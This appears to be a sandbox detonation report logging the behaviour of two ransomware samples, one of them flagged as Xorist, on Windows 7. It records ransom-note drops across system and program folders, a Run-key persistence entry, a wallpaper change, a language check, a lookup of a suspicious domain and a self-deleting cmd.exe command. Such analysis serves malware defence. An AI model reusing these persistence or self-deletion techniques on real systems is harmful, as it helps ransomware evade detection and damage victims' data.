File created C:\Windows\winsxs\x86_microsoft-windows-l..-ultimate.resources_31bf3856ad364e35_6.1.7600.16385_es-es_e9c2f754efcb477f\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..fessional.resources_31bf3856ad364e35_6.1.7601.17514_es-es_f5f7b0a614550298\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_de-de_8a445b750021d88a\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..essionaln.resources_31bf3856ad364e35_6.1.7601.17514_it-it_16b2136334d4d376\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-n..sh-helper.resources_31bf3856ad364e35_6.1.7600.16385_de-de_9b3b900d1741a8cd\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-sonic-symphonyntsc_31bf3856ad364e35_6.1.7600.16385_none_d75d6085d60aa50d\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-g..-calendar.resources_31bf3856ad364e35_6.1.7600.16385_en-us_dd95cd2390bb17bc\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..-startern.resources_31bf3856ad364e35_6.1.7601.17514_es-es_c82940e03ac63534\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\x86_microsoft-windows-l..ultimatee.resources_31bf3856ad364e35_6.1.7601.17514_ja-jp_1f13ba22df0a61ce\ReadMe.html C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\inf\TAPISRV\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\_TransactionBridgePerfCounters.h.jaff C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_microsoft-windows-l..m-starter.resources_31bf3856ad364e35_6.1.7601.17514_es-es_8f1f29d5a784472a\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\winsxs\amd64_wiabr00a.inf_31bf3856ad364e35_6.1.7600.16385_none_1ff46c750309ff30\ReadMe.bmp C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
File created C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\1046\ReadMe.txt C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe

"C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\e5df2d114c5f69c219923fed56c8aa7ee912020ba7589e88f2729285c1f5788a.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 fkksjobnn43.org udp

Files

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:11

Platform

win7-20240903-en

Max time kernel

58s

Max time network

59s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e8e07496df5370d2e49ecce5a47c1fd2.exe"

Signatures

Detected Xorist Ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Xorist Ransomware

ransomware xorist

Xorist family

xorist

Renames multiple (2558) files with added filename extension

ransomware

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\de-DE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\drivers\it-IT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bdx48saERp3j6l1.exe" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\InfDefaultInstall.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmdsi.inf_amd64_neutral_e77f438012239042\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmusrk1.inf_amd64_neutral_19cdebd3e1182874\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\Dism\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wudfusbcciddriver.inf_amd64_neutral_adc3e4acb1046b4b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\ko-KR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\migwiz\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\shutdown.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\lsi_sas2.inf_amd64_neutral_e12a5c4cfbe49204\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\usbprint.inf_amd64_neutral_54948be2bc4bcdd1\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_debuggers.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_parameters.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph6xib64c0.inf_amd64_neutral_a43df8f7441e1c61\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnep002.inf_amd64_neutral_efc4a7485b172c07\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiaep003.inf_amd64_neutral_c2a98813147bf34e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_locations.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\UltimateN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_type_operators.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\ar-SA\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\Starter\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmiodat.inf_amd64_neutral_839e9ee1a8736613\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmlasat.inf_amd64_neutral_bc1469ba40fe2114\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wialx005.inf_amd64_neutral_5304c93e2193f237\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\StarterE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\zh-CN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\rekeywiz.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_remote_jobs.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\brmfcmdm.inf_amd64_neutral_af49d2f3ffa12116\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\esentutl.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Starter\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\migwiz\replacementmanifests\WindowsSearchEngine\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_Assignment_Operators.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmzyxel.inf_amd64_neutral_ed1f16b3d0cae908\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_neutral_4616c3de1949be6d\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnbr003.inf_amd64_neutral_dff45d1d0df04caf\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wdmaudio.inf_amd64_neutral_423894ded0ba8fdf\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiahp001.inf_amd64_neutral_aee49cdf3b352e58\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmnokia.inf_amd64_neutral_a8e9a41983d33a0b\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc11.inf_amd64_neutral_bb18e5f134c40c68\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\EnterpriseN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\_Default\ProfessionalN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\dllhost.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\angelu64.inf_amd64_neutral_3d6079dd78127f5e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\pt-PT\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmaiwa4.inf_amd64_neutral_6e97842bb8d9e6a8\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmbtmdm.inf_amd64_neutral_2e4da8629fc5904e\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnky308.inf_amd64_ja-jp_d90af802b607044a\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\transfercable.inf_amd64_neutral_82f4c743c8996d67\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\windowssideshowenhanceddriver.inf_amd64_neutral_184a2ef2a8f57c33\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\OEM\Professional\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\OEM\ProfessionalN\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnbr004.inf_amd64_neutral_a78e168d6944619a\Amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\ipconfig.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_script_internationalization.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\HomePremium\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\averfx2swtv_x64.inf_amd64_neutral_24a71cdaabc7f783\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\StarterE\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\circlass.inf_amd64_neutral_cf52485bed804e02\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\SysWOW64\Recovery\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\atiriol6.inf_amd64_neutral_bde34ad5722cca75\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\disk.inf_amd64_neutral_10ce25bbc5a9cc43\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\tsprint.inf_amd64_neutral_c48d421ad2c1e3e3\amd64\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ncihmbejmpladfin.bmp" C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_h.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\flyout.html C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1033\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_dot.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01750_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02829J.JPG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Mail\WinMail.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECLIPSE\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\icon.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21390_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10308_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\fr-FR\css\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Journal\Templates\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Mail\wabmig.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10289_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Mail\es-ES\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonSubpicture.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\2.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\bg_Groove.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\VideoLAN\VLC\lua\http\requests\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Stucco.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\ja-JP\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02077_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmap.exe C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsMacroTemplate.html C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\MSBuild\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-image-inset.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21421_.GIF C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_settings.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\HOW TO DECRYPT FILES.txt C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png C:\Users\Admin\AppData\Local\Tempsvchost.exe N/A
